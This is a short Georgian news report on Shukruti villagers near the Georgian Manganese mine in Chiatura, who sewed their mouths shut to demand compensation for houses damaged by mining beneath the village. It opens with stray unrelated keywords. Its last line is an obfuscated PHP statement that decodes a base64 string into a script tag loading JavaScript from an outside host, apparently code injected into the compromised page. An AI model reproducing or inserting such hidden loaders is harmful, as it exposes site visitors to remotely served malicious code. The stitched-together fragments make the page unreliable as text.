celsiusi
ავერსი შნაიდერი

ჭიათურაში, "ჯორჯიან მანგანეზის" კოროხნალის მაღაროსთან სოფელ შუქრუთის მცხოვრებლებმა, რომლებიც საპროტესტო აქციას მართავენ, პირი ამოიკერეს. 

 
აქციის მონაწილეები "ჯორჯიან მანგანეზისგან" კომპენსაციის გადახდას ითხოვენ. მათი ინფორმაციით, სოფელ შუქრუთში სახლები ნახევრად ან სრულად დანგრეულია, ეზოებში ღრმულები გაჩნდა .
 
ადგილობრივების მტკიცებით, მათი სოფლის ქვეშ "ჯორჯიან მანგანეზი" მანგანუმს მოიპოვებს. აქციის მონაწილეები, რომლებმაც პროტესტის უკიდურეს ზომას მიმართეს, მთავრობის წარმომადგენლებთან შეხვედრას და უფლებადაცვითი ორგანიზაციების მხრიდან ყურადღებას ითხოვენ.   
 
 
 
1341
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");